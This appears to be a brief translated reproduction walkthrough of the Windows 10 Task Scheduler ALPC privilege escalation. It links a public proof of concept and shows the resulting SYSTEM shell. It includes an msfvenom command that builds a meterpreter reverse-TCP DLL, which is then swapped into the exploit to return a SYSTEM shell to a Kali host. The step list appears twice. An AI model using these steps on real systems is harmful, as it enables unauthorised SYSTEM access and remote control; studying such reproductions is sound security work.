The function exported by the task scheduling service in Windows 10 does not verify the caller's permissions. Users with any permissions can obtain write permissions for sensitive system files by calling this function, thereby escalating privileges. Scope of impact: Windows 10, Windows Server 2016 Yesterday, the friends in the group reproduced it and succeeded. Some friends also tried it on Windows 8 and found that they could also escalate privileges successfully.
Preparation: Download POC, Windows 10 image, Process Explorer, CFF
POC: GitHub - SandboxEscaper/randomrepo: Repo for random stuff
Windows 10 ISO: msdn Download
Process Explorer: Process Explorer - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite - NTCore
First open a notepad
There is no difference, execution
cmd.exe with child processes conhost and notepad has been generated as SYSTEM!
In kali execute msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll
Moving to Windows 10
Open ALPC-TaskSched-LPE.dll in CFF and replace the dll generated by msf, then save it.
Execute monitoring commands in Kali
Execute in Windows 10
Return to Kali and you can find that a meterpreter has been successfully bounced back, and it has system permissions
Preparation: Download POC, Windows 10 image, Process Explorer, CFF
POC: GitHub - SandboxEscaper/randomrepo: Repo for random stuff
Windows 10 ISO: msdn Download
Process Explorer: Process Explorer - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite - NTCore
First open a notepad
There is no difference, execution
cmd.exe with child processes conhost and notepad has been generated as SYSTEM!
In kali execute msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll
Moving to Windows 10
Open ALPC-TaskSched-LPE.dll in CFF and replace the dll generated by msf, then save it.
Execute monitoring commands in Kali
Execute in Windows 10
Return to Kali and you can find that a meterpreter has been successfully bounced back, and it has system permissions